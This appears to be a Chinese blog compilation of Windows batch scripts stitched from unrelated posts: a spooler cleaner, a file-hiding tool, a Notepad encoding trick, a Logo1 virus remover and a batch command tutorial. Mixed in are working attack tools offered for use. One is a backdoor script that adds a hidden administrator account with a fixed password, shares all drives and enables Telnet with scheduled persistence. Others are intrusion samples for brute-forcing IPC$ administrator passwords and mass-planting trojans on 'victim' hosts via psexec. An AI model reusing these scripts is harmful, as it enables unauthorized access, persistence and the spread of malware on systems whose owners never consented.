其实方法很简单，我一直都是这么做的。最近没什么技术文章好写，写写这种算充个数吧，呵呵，见笑了~下面我以昨天刚下载的一个“打印任务一键清除”exe程序来作演示，看看如何破解出它的批处理源代码。今天13号，程序还是前天刚写的。

　　首先，双击程序运行，不要关闭，有些程序在关闭的时候会KillSelf；

　　其次，在CMD下cd %temp%，一开始我用dir *.bat没有找到，这时你要想到有可能是.cmd文件，所以可以试下dir *.cmd，结果也没有；

　　再次，我以下面这张截图来说明：

　　最后，把找到的BAT复制出来，右击“编辑”就能看到源代码了。源代码如下：

@echo off
title 【 打印任务一键清除 】  BY：wnsdt
color 2f
echo.&echo.&echo.
echo           说明（2011.10.11）:
echo.&echo.
echo              本工具可快速清除无响应的打印任务，解决无法打印的问题！
echo.
echo              如连接网络中共享的打印机，请在那台计算机运行本工具 ！
echo.&echo.
echo      ----------------------------------------------------------------
echo.
echo              有问题到微博留言   http://t.qq.com/wnsdt_kk
echo.&echo.&echo.&echo.&echo.&echo.
echo              按任意键开始，退出请直接关闭
pause>nul 2>nul
cls
echo.&echo.&echo.&echo.&echo.&echo.
echo        稍后清理完毕，请重新打印......
sc config spooler start= disabled>nul 2>nul
net stop spooler>nul 2>nul
del %systemroot%\System32\spool\PRINTERS\*.* /q /s /f>nul 2>nul
sc config spooler start= auto>nul 2>nul
net start spooler>nul 2>nul
exit

Windows文件保护专家，源代码如下：

@echo off
rem Written by heroest
rem Feb 17th,2006
setlocal
color 0b
echo ===============================================================
echo.
echo Windows文件保护专家 v1.0
echo.
echo.
echo 说明：本程序可以有效的保护重要的文件不被删除或泄露。
echo 加入了删除文档的代码，可以删除那些被保护的文档
echo 版权没有，欢迎盗版!
echo ===============================================================
:start
echo.
echo 建立文件保护文件夹 c:\FileLocker
if not exist c:\FileLocker..\nul md c:\FileLocker..\
echo 欢迎使用windwos保护专家 v1.0,请选择选项（1,2,3,4,5,q）;
echo 1.读取加密的文档
echo 2.存储保密文档
echo 3.建立秘密存储文档
echo 4.删除保密文档
echo 5.删除FileLocker
echo q.推出
echo.
set /p choice=
if {%choice%}=={} goto start
if /i %choice%==1 goto djm
if /i %choice%==2 goto cjm
if /i %choice%==3 goto jjm
if /i %choice%==4 goto sjm
if /i %choice%==5 goto df
if /i %choice%==q goto quit
goto start
rem========================加入秘密文件夹==========================
:jjm
echo.
echo 准备建立秘密文件夹...
echo 请输入密码:
set /p pass2c=
if {%pass2c%}=={} goto jjm
echo 开始根据密码建立保密文件夹......
md "c:\FileLocker..\%pass2c%..\"
echo 建立了保护文件夹!
echo.
goto start
rem ======================“加入”部分结束=========================
rem
rem =====================存储数据部分==============================
:cjm
echo.
echo 准备存储保密档案...
echo 请输入密码：
set /p pass=
if {%pass%}=={} goto cjm
if exist c:\FileLocker..\%pass%..\nul goto noerror
echo 发生错误，未发现建立加密保护文件夹！
goto start
:noerror
md "%userprofile%\桌面\Ready2Lock"
echo 请将你需要保护的文件复制到桌面上的Ready2Lock文件夹内(被保存的文件不能含有文件夹）
echo 注意：开始保护后会删除原文件!
echo 按任意键开始保护文件.......
pause > nul
echo 开始保护到C:\FileLocker文件夹内.........
copy "%userprofile%\桌面\Ready2Lock\*.*" "c:\FileLocker..\%pass%..\"
echo 保护完成，删除原文件........
del "%userprofile%\桌面\Ready2Lock\*.*" /Q
rd "%userprofile%\桌面\Ready2Lock"
echo 所有保护完成!
ping 127.0.0.1 -n 3 >nul
cls
goto start
rem ==========================存储部分结束=======================
rem
rem ===========================读取数据部分======================
:djm
echo.
echo 准备读取保密文件...
echo 请输入密码：
set /p pass2=
if {%pass2%}=={} goto djm
if not exist c:\FileLocker..\%pass2%..\nul echo 发生错误或不存在保护文档 & goto djm
echo 开始读取被保护的数据.......
if not exist "%userprofile%\桌面\Unlocked\nul" md "%userprofile%\桌面\Unlocked"
copy "c:\FileLocker..\%pass2%..\*.*" "%userprofile%\桌面\Unlocked"
echo 已经解密到桌面上的Unlocked文件夹内.........
ping 127.0.0.1 -n 3 >nul
goto start
rem ========================读取数据部分结束=======================
rem
rem ========================删除目录部分===========================
rem 此部分特别感谢"猜猜鸟"教会了我新的知识，谢谢了！
rem 感谢"江山"的提供了宝贵的意见
rem 也感谢支持我的朋友们，没有你们的鼓励，小弟也不敢斗胆发表自己的作品
:sjm
echo.
echo.
echo 准备删除秘密文档.......
echo 请输入密码：
set /p pass2del=
if {%pass2del%}=={} goto sjm
echo 开始删除被保护文件夹
rmdir /s "c:\FileLocker..\%pass2del%..\" /Q
echo 已经删除被保护文件.......
goto start
rem ============================删除部分结束======================
rem
rem ===================Del FileLocker==============================
:df
echo.
echo 请删除之前确认FileLocker里面没有任何秘密文档.(y/n)
set /p yesorno=
if /i %yesorno%==y goto start2del
if /i %yesorno%==n goto sjm
goto df
:start2del
echo 开始删除FileLocker..........
rd "c:\FileLocker..\" >nul
if exist c:\FileLocker..\nul echo **删除失败，可能FileLocker里有别的秘密文档。**& goto fail
echo 成功删除!
:fail
ping 127.0.0.1 -n 3 >nul
goto start
rem ================Del Filelocker End====================
:quit
echo 感谢使用Windows文件保护专家 v1.0!
echo 按任意键退出本程序.
pause > nul
exit

　　放日志文章主要不是送给大家这个软件，而是阅读其中的源代码，我觉得可以学到不少批处理方面的知识。

　　程序不是我写的，版权归原作者所有。

源代码：

%%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a
@echo off
net user
net start

注意：命令部分随便输入,但是命令后面不要有空格。

破解方法：直接在cmd下用edit打开或者用word打开即可。

原理：

　　记事本程序在保存一篇新建的文档时，如果没有指定编码类型，会使用缺省的ANSI类型（对于中文版来说，对应的就是GB码）。而在打开一篇已创建的文档时，它会分析文档的编码类型，它首先判断文档头部有无BOM（Byte order Mark，字节序标记，长度为(2-3字节)，如有则根据其内容判断编码类型，FF、FE（Unicode）,FE、FF（Unicode big endian）,EF、BB、BF（UTF-8)因为事实上有很多非ANSI编码的文档是没有任何BOM的“纯文本”，所以对这些文档不能简单的判断为ANSI编码。而需要使用一系列的统计学算法根据文档内容来猜测文档编码。记事本使用了 IsTextUnicode 函数来判断是否为Unicode/Unicode big endian 编码，使用 IsTextUTF8 判断是否为 UTF8 编码。但既然是统计学算法，就难免存在误判，尤其在文档内容过短时，由于样本的容量太小，这种误判的概率会显著增大。比如那个有名的微软与联通有仇的笑话，就是记事本在打开只有"联通"二字的ANSI编码文档时，IsTextUTF8 函数将其误判为UTF8编码[2]；同样的误判也发生在IsTextUnicode 函数上，比如具有 “this app can break”这种具有4335结构的文档，会被误判为 Unicode 编码[3][4]。

　　需要说明的是，这种误判的可能性是建立在文本较短且其字节位特征不被干扰的前提上的。如果将上述的文本做稍许修改（即使只是增加一个回车），则误判很难再发生。

　　而这种方法的特殊性在于，它的字节串不但具有Unicode特征，而且很长达到了1288字节，也就是说它的Unicode特征性很强，所以可以抵抗一些较短的不具有Unicode特征串的干扰，这是由统计学的规律所决定的。但是在干扰串稍长时，Unicode的特征将会受到显著干扰，直至被 IsTextUnicode 函数认定为非 Unicode。所以，有些朋友总是无法测试成功，应该是与附加的批处理代码长度和内容相关。

　　因为其他的编辑器（比如 Word / Wordpad / EditPlus / UltraEdit）使用了更新的编码类型判断算法，所以在 Unicode 判断上改进了不少，而 UTF8 的判断仍然不尽如人意。但因为理论上来说完全准确地算法并不存在，所以我们只能依靠避免使用无BOM的非ANSI文档，或者打开文档时手动指定编码类型。

　　另外，如果使用记事本保存了这些误判了编码类型的文件，则将难以恢复。如果使用误判编码保存，则将给原文档加上BOM标记，则使用其他编辑器也再无法观察到原文档。如果使用 ANSI 编码保存，则原文档将会被当作 Unicode 文档而被转换，还原的可能性接近于零。

regsvr32 /u /s igfxpph.dll
reg delete HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers /f
reg add HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers\new /ve /d {D969A300-E7FF-11d0-A93B-00A0C90F2719}
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v HotKeysCmds /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v IgfxTray /f

@echo off

if exist %windir%\rundl132.exe echo 发现威金!

pause

taskkill /f /im rundl132.exe
taskkill /f /im logo_1.exe
taskkill /f /im logo1_.exe
taskkill /f /im Ravmon.exe
taskkill /f /im Eghost.exe
taskkill /f /im Mailmon.exe
taskkill /f /im KAVPFW.EXE
taskkill /f /im IPARMOR.EXE
taskkill /f /im Ravmond.exe
taskkill /f /im 0sy.exe
taskkill /f /im 1sy.exe
taskkill /f /im 2sy.exe
taskkill /f /im 3sy.exe
taskkill /f /im 4sy.exe
taskkill /f /im 5sy.exe
taskkill /f /im 6sy.exe
taskkill /f /im 7sy.exe
taskkill /f /im 8sy.exe
taskkill /f /im 9sy.exe
taskkill /f /im 10sy.exe
taskkill /f /im 11sy.exe
taskkill /f /im 12sy.exe
taskkill /f /im 13sy.exe
taskkill /f /im 15sy.exe
taskkill /f /im 25sy.exe

::以上为结束病毒进程.

attrib %windir%\Logo1_.exe -s -r -h
attrib %windir%\rundl132.exe -s -r -h
attrib %windir%\0Sy.exe -s -r -h
attrib %windir%\vDll.dll -s -r -h
attrib %windir%\1Sy.exe -s -r -h
attrib %windir%\2Sy.exe -s -r -h
attrib %windir%\rundll32.exe -s -r -h
attrib %windir%\3Sy.exe -s -r -h
attrib %windir%\5Sy.exe -s -r -h
attrib %windir%\1.com -s -r -h
attrib %windir%\exerouter.exe -s -r -h
attrib %windir%\EXP10RER.com -s -r -h
attrib %windir%\finders.com -s -r -h
attrib %windir%\Shell.sys -s -r -h
attrib %windir%\kill.exe -s -r -h
attrib %windir%\sws.dll -s -r -h
attrib %windir%\sws32.dll -s -r -h
attrib %windir%\uninstall\rundl132.exe -s -r -h
attrib c:\windows\SVCHOST.exe -s -r -h
attrib c:\windows\WINLOGON.exe -s -r -h
attrib c:\windows\RUNDLL32.EXE -s -r -h
attrib C:\"Program Files"\svchost.exe -s -r -h
attrib C:\"Program Files"\"Internet Explorer"\svchost.exe -s -r -h
attrib %windir%\Download\svchost.exe -s -r -h
attrib %windir%\system32\wldll.dll -s -r -h
attrib c:\windows\system32\Microsoft\svchost.exe -s -r -h

del /f /s /q /a %systemdrive%\rundl132.exe
del /f /s /q /a %systemdrive%\rundll32.exe
del /f /s /q /a %systemdrive%\Dll.dll
del /f /s /q /a %systemdrive%\vdll.dll
del /f /s /q /a %systemdrive%\logo_1.exe
del /f /s /q /a %systemdrive%\Logo1_.exe
del /f /s /q /a %systemdrive%\Logo1.exe
del /f /s /q /a %systemdrive%\?sy.exe
del /f /s /q /a %windir%\Logo1_.exe
del /f /s /q /a %windir%\rundl132.exe
del /f /s /q /a %windir%\0Sy.exe
del /f /s /q /a %windir%\vDll.dll
del /f /s /q /a %windir%\1Sy.exe
del /f /s /q /a %windir%\2Sy.exe
del /f /s /q /a %windir%\rundll32.exe
del /f /s /q /a %windir%\3Sy.exe
del /f /s /q /a %windir%\5Sy.exe
del /f /s /q /a %windir%\1.com
del /f /s /q /a %windir%\exerouter.exe
del /f /s /q /a %windir%\EXP10RER.com
del /f /s /q /a %windir%\finders.com
del /f /s /q /a %windir%\Shell.sys
del /f /s /q /a %windir%\kill.exe
del /f /s /q /a %windir%\sws.dll
del /f /s /q /a %windir%\sws32.dll
del /f /s /q /a %windir%\uninstall\rundl132.exe
del /f /s /q /a c:\windows\SVCHOST.exe
del /f /s /q /a c:\windows\WINLOGON.exe
del /f /s /q /a c:\windows\RUNDLL32.EXE
del /f /s /q /a C:\"Program Files"\svchost.exe
del /f /s /q /a C:\"Program Files"\"Internet Explorer"\svchost.exe
del /f /s /q /a c:\windows\Download\svchost.exe
del /f /s /q /a c:\windows\system32\Microsoft\svchost.exe
del /f /s /q /a c:\windows\system32\wldll.dll
del /f /s /q /a c:\_desktop.ini
del /f /s /q /a d:\_desktop.ini
del /f /s /q /a e:\_desktop.ini
del /f /s /q /a f:\_desktop.ini

::以上为删除病毒相关文件.

net share c$ /del
net share d$ /del
net share e$ /del
net share f$ /del
net share admin$ /del
net share ipc$ /del

pause

taskkill /f /im conime.exe
exit

　　原来这么简单的一个批处理就可以称为专杀工具了，只不过就收集了几个常见的logo1病毒的文件名而已。不过logo1本来就是蠕虫病毒，特点应该是大范围传播，而不是顽固型的。
这样的一来，我想写个免疫补丁也就不难了。打开Logo1免疫补丁.bat，内容如下：

echo > %windir%\Logo1_.exe
echo > %windir%\rundl132.exe
echo > %windir%\0Sy.exe
echo > %windir%\vDll.dll
echo > %windir%\1Sy.exe
echo > %windir%\2Sy.exe
echo > %windir%\rundll32.exe
echo > %windir%\3Sy.exe
echo > %windir%\5Sy.exe
echo > %windir%\1.com
echo > %windir%\exerouter.exe
echo > %windir%\EXP10RER.com
echo > %windir%\finders.com
echo > %windir%\Shell.sys
echo > %windir%\kill.exe
echo > %windir%\sws.dll
echo > %windir%\sws32.dll
echo > %windir%\uninstall\rundl132.exe
echo > %windir%\SVCHOST.exe
echo > %windir%\WINLOGON.exe
echo > %windir%\RUNDLL32.EXE
echo > C:\"Program Files"\svchost.exe
echo > C:\"Program Files"\"Internet Explorer"\svchost.exe
echo > %windir%\Download\svchost.exe
echo > %windir%\system32\wldll.dll

attrib %windir%\Logo1_.exe +s +r +h
attrib %windir%\rundl132.exe +s +r +h
attrib %windir%\0Sy.exe +s +r +h
attrib %windir%\vDll.dll +s +r +h
attrib %windir%\1Sy.exe +s +r +h
attrib %windir%\2Sy.exe +s +r +h
attrib %windir%\rundll32.exe +s +r +h
attrib %windir%\3Sy.exe +s +r +h
attrib %windir%\5Sy.exe +s +r +h
attrib %windir%\1.com +s +r +h
attrib %windir%\exerouter.exe +s +r +h
attrib %windir%\EXP10RER.com +s +r +h
attrib %windir%\finders.com +s +r +h
attrib %windir%\Shell.sys +s +r +h
attrib %windir%\kill.exe +s +r +h
attrib %windir%\sws.dll +s +r +h
attrib %windir%\sws32.dll +s +r +h
attrib %windir%\uninstall\rundl132.exe +s +r +h
attrib %windir%\SVCHOST.exe +s +r +h
attrib %windir%\WINLOGON.exe +s +r +h
attrib %windir%\RUNDLL32.EXE +s +r +h
attrib C:\"Program Files"\svchost.exe +s +r +h
attrib C:\"Program Files"\"Internet Explorer"\svchost.exe +s +r +h
attrib %windir%\Download\svchost.exe +s +r +h
attrib %windir%\system32\wldll.dll +s +r +h

　　logo_1.exe病毒专杀工具和免疫补丁下载：

　　点击下载

@echo off
@attrib +s +r hqw.bat
@net user hqw hack520org /add
@net localgroup administrators hqw /add
@sc config lanmanserver start= auto
@net start server
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm

@sc config Schedule start= auto
@net stop "Task Scheduler"
@net start "Task Scheduler"
@echo at 11:00 %systemroot%\SYSTEM32\log.bat > %systemroot%\SYSTEM32\hqw.bat
@echo at 23:00 %systemroot%\SYSTEM32\log.bat >> %systemroot%\SYSTEM32\hqw.bat
@at 11:05 %systemroot%\SYSTEM32\hqw.bat
@at 23:05 %systemroot%\SYSTEM32\hqw.bat
@sc config tlntsvr start= auto
@net stop telnet
@net start telnet
@exit

这样就会循环运行我们的程序了，即使被人停下来，过几个小时(时间可以自己改)会自动重新运行，呵呵~~
运行后TELNET IP上去，用户名为hqw，密码为hack520org。

解释一下这个批处理的核心代码：
[quote]把以上的批处理保存为log.bat运行后他自动生成
hqw.bat
其中
hqw.bat的内容为
at 11:00 %systemroot%\system32\log.bat
at 23:00 %systemroot%\system32\log.bat

@echo at 11:00 %systemroot%\SYSTEM32\log.bat > %systemroot%\SYSTEM32\hqw.bat
@echo at 23:00 %systemroot%\SYSTEM32\log.bat >> %systemroot%\SYSTEM32\hqw.bat

这个意思是
把at 11:00 %systemroot%\SYSTEM32\log.bat 写进%systemroot%\SYSTEM32\hqw.bat 文件..如果没有就自动创建
第二个
@echo at 23:00 %systemroot%\SYSTEM32\log.bat >> %systemroot%\SYSTEM32\hqw.bat
同理..不过因为第一句已经创建了..所以第二个直接添加at 23:00 %systemroot%\SYSTEM32\log.bat这里注意一定要是>>如果是>的话回直接覆盖那个hqw.bat文件

hqw.bat的作用是在特定的时间执行
log.bat的..其中log.bat执行后…又自动创建并覆盖hqw.bat
他两个就好比是在互相监视的
但如果log.bat被删除了话..这个批处理后门就没啥用了

如果你把这个批出来的文件名改为hqw.bat为不是log.bat运行后你会发现hqw.bat的内容由原来的换成了
at 11:00 %systemroot%\system32\log.bat
所以一定要把文件名改为log.bat这样才会成功[/quote]

打开回显或关闭请求回显功能，或显示消息。如果没有任何参数，echo 命令将显示当前回显设置。
语法
echo [{on|off}] [message]
Sample：echo off / echo hello world
在实际应用中我们会把这条命令和重定向符号（也称为管道符号，一般用> >> ^）结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。

2.@ 命令

表示不显示@后面的命令，在入侵过程中（例如使用批处理来格式化敌人的硬盘）自然不能让对方看到你使用的命令啦。
Sample：@echo off
@echo Now initializing the program,please wait a minite…
@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的，可喜的是微软留了个autoset这个参数给我们，效果和/y是一样的。)

3.Goto 命令

指定跳转到标签，找到标签后，程序将处理从下一行开始的命令。
语法：goto label （label是参数，指定所要转向的批处理程序中的行。）
Sample：
if {%1}=={} goto noparms
if {%2}=={} goto noparms（如果这里的if、%1、%2你不明白的话，先跳过去，后面会有详细的解释。）
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
标签的名字可以随便起，但是最好是有意义的字母啦，字母前加个：用来表示这个字母是标签，goto命令就是根据这个：来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。

4.Rem 命令

注释命令，在C语言中相当与/*——–*/,它并不会被执行，只是起一个注释的作用，便于别人阅读和你自己日后修改。
Rem Message
Sample：@Rem Here is the description.

5.Pause 命令

运行 Pause 命令时，将显示下面的消息：
Press any key to continue . . .
Sample：
@echo off
:begin
copy a:*.* d：\back
echo Please put a new disk into driver A
pause
goto begin
在这个例子中，驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时，pause 命令会使程序挂起，以便您更换磁盘，然后按任意键继续处理。

6.Call 命令

从一个批处理程序调用另一个批处理程序，并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call，它将不会在命令行起作用。
语法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
参数
[Drive:}[Path] FileName
指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。

7.start 命令

调用外部程序，所有的DOS命令和命令行程序都可以由start命令来调用。
入侵常用参数：
MIN 开始时窗口最小化
SEPARATE 在分开的空间内开始 16 位 Windows 程序
HIGH 在 HIGH 优先级类别开始应用程序
REALTIME 在 REALTIME 优先级类别开始应用程序
WAIT 启动应用程序并等候它结束
parameters 这些为传送到命令/程序的参数
执行的应用程序是 32-位 GUI 应用程序时，CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行，该新行为则不会发生。

8.choice 命令

choice 使用此命令可以让用户输入一个字符，从而运行不同的命令。使用时应该加/c:参数，c:后应写提示可输入的字符，之间无空格。它的返回码为1234……

如: choice /c:dme defrag,mem,end
将显示
defrag,mem,end[D,M,E]?
Sample：
Sample.bat的内容如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag （应先判断数值最高的错误码）
if errorlevel 2 goto mem
if errotlevel 1 goto end

:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye

此文件运行后，将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ，然后if语句将作出判断，d表示执行标号为defrag的程序段，m表示执行标号为mem的程序段，e表示执行标号为end的程序段，每个程序段最后都以goto end将程序跳到end标号处，然后程序将显示good bye，文件结束。

9.If 命令

if 表示将判断是否符合规定的条件，从而决定执行不同的命令。 有三种格式:
1、if "参数" == "字符串" 待执行的命令
参数如果等于指定的字符串，则条件成立，运行命令，否则运行下一句。(注意是两个等号）
如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms

2、if exist 文件名 待执行的命令
如果有指定的文件，则条件成立，运行命令，否则运行下一句。
如if exist config.sys edit config.sys

3、if errorlevel / if not errorlevel 数字 待执行的命令
如果返回码等于指定的数字，则条件成立，运行命令，否则运行下一句。
如if errorlevel 2 goto x2
DOS程序运行时都会返回一个数字给DOS，称为错误码errorlevel或称返回码，常见的返回码为0、1。

10.for 命令

for 命令是一个比较复杂的命令，主要用于参数在指定的范围内循环执行命令。
在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable

for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一个单一字母可替换的参数。
(set) 指定一个或一组文件。可以使用通配符。
command 指定对每个文件执行的命令。
command-parameters 为特定命令指定参数或命令行开关。
在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable
而不要用 %variable。变量名称是区分大小写的，所以 %i 不同于 %I

如果命令扩展名被启用，下列额外的 FOR 命令格式会受到
支持:

FOR /D %variable IN (set) DO command [command-parameters]

如果集中包含通配符，则指定与目录名匹配，而不与文件
名匹配。

FOR /R [[drive:]path] %variable IN (set) DO command [command-

检查以 [drive:]path 为根的目录树，指向每个目录中的
FOR 语句。如果在 /R 后没有指定目录，则使用当前
目录。如果集仅为一个单点(.)字符，则枚举该目录树。

FOR /L %variable IN (start,step,end) DO command [command-para

该集表示以增量形式从开始到结束的一个数字序列。
因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生
序列 (5 4 3 2 1)。

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command

或者，如果有 usebackq 选项:

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command

filenameset 为一个或多个文件名。继续到 filenameset 中的
下一个文件之前，每份文件都已被打开、读取并经过处理。
处理包括读取文件，将其分成一行行的文字，然后将每行
解析成零或更多的符号。然后用已找到的符号字符串变量值
调用 For 循环。以默认方式，/F 通过每个文件的每一行中分开
的第一个空白符号。跳过空白行。您可通过指定可选 "options"
参数替代默认解析操作。这个带引号的字符串包括一个或多个
指定不同解析选项的关键字。这些关键字为:

eol=c – 指一个行注释字符的结尾(就一个)
skip=n – 指在文件开始时忽略的行数。
delims=xxx – 指分隔符集。这个替换了空格和跳格键的
默认分隔符集。
tokens=x,y,m-n – 指每行的哪一个符号被传递到每个迭代
的 for 本身。这会导致额外变量名称的
格式为一个范围。通过 nth 符号指定 m
符号字符串中的最后一个字符星号，
那么额外的变量将在最后一个符号解析之
分配并接受行的保留文本。
usebackq – 指定新语法已在下类情况中使用:
在作为命令执行一个后引号的字符串并且
引号字符为文字字符串命令并允许在 fi
中使用双引号扩起文件名称。

sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

会分析 myfile.txt 中的每一行，忽略以分号打头的那些行，将
每行中的第二个和第三个符号传递给 for 程序体；用逗号和/或
空格定界符号。请注意，这个 for 程序体的语句引用 %i 来
取得第二个符号，引用 %j 来取得第三个符号，引用 %k
来取得第三个符号后的所有剩余符号。对于带有空格的文件
名，您需要用双引号将文件名括起来。为了用这种方式来使
用双引号，您还需要使用 usebackq 选项，否则，双引号会
被理解成是用作定义某个要分析的字符串的。

%i 专门在 for 语句中得到说明，%j 和 %k 是通过
tokens= 选项专门得到说明的。您可以通过 tokens= 一行
指定最多 26 个符号，只要不试图说明一个高于字母 z 或
Z 的变量。请记住，FOR 变量是单一字母、分大小写和全局的；
同时不能有 52 个以上都在使用中。

您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是，
用单引号将括号之间的 filenameset 括起来。这样，该字符
串会被当作一个文件中的一个单一输入行。

最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将
括号之间的 filenameset 变成一个反括字符串。该字符串会
被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进
内存，并被当作文件分析。因此，以下例子:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

会枚举当前环境中的环境变量名称。

另外，FOR 变量参照的替换已被增强。您现在可以使用下列
选项语法:

~I – 删除任何引号(")，扩充 %I
%~fI – 将 %I 扩充到一个完全合格的路径名
%~dI – 仅将 %I 扩充到一个驱动器号
%~pI – 仅将 %I 扩充到一个路径
%~nI – 仅将 %I 扩充到一个文件名
%~xI – 仅将 %I 扩充到一个文件扩展名
%~sI – 扩充的路径只含有短名
%~aI – 将 %I 扩充到文件的文件属性
%~tI – 将 %I 扩充到文件的日期/时间
%~zI – 将 %I 扩充到文件的大小
%~$PATH:I – 查找列在路径环境变量的目录，并将 %I 扩充
到找到的第一个完全合格的名称。如果环境变量
未被定义，或者没有找到文件，此组合键会扩充
空字符串

可以组合修饰符来得到多重结果:

%~dpI – 仅将 %I 扩充到一个驱动器号和路径
%~nxI – 仅将 %I 扩充到一个文件名和扩展名
%~fsI – 仅将 %I 扩充到一个带有短名的完整路径名
%~dp$PATH:i – 查找列在路径环境变量的目录，并将 %I 扩充
到找到的第一个驱动器号和路径。
%~ftzaI – 将 %I 扩充到类似输出线路的 DIR

在以上例子中，%I 和 PATH 可用其他有效数值代替。%~ 语法
用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名
比较易读，而且避免与不分大小写的组合键混淆。

以上是MS的官方帮助，下面我们举几个例子来具体说明一下For命令在入侵中的用途。

sample2：

利用For命令来实现对一台目标Win2k主机的暴力密码破解。
我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接，当成功时记下密码。
最主要的命令是一条：for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
用i%来表示admin的密码，在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令－－
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\ok.txt ，这样就ko了。

sample3：

你有没有过手里有大量肉鸡等着你去种后门＋木马呢？，当数量特别多的时候，原本很开心的一件事都会变得很郁闷：）。文章开头就谈到使用批处理文件，可以简化日常或重复性任务。那么如何实现呢？呵呵，看下去你就会明白了。

主要命令也只有一条：（在批处理文件中使用 FOR 命令时，指定变量使用 %%variable）
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法请参见上面的sample1，在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。
而cultivate.bat无非就是用net use命令来建立IPC$连接，并copy木马＋后门到victim，然后用返回码（If errorlever =）来筛选成功种植后门的主机，并echo出来，或者echo到指定的文件。
delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列，一般就是 ip password username。
代码雏形：

————— cut here then save as a batchfile(I call it main.bat ) ——————–
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
————— cut here then save as a batchfile(I call it main.bat ) ——————–

——————- cut here then save as a batchfile(I call it door.bat) —————–
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@p***ec \\%1 c:\winnt\system32\windrv32.exe
@p***ec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
—————– cut here then save as a batchfile(I call it door.bat) ——————-
这只是一个自动种植后门批处理的雏形，两个批处理和后门程序（Windrv32.exe）,PSexec.exe需放在统一目录下.批处理内容
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.

有关某个命令的详细信息，请键入 HELP 命令名

XP CMD命令大全

有关某个命令的详细信息，请键入 HELP 命令名
ASSOC 显示或修改文件扩展名关联。
AT 计划在计算机上运行的命令和程序。
ATTRIB 显示或更改文件属性。
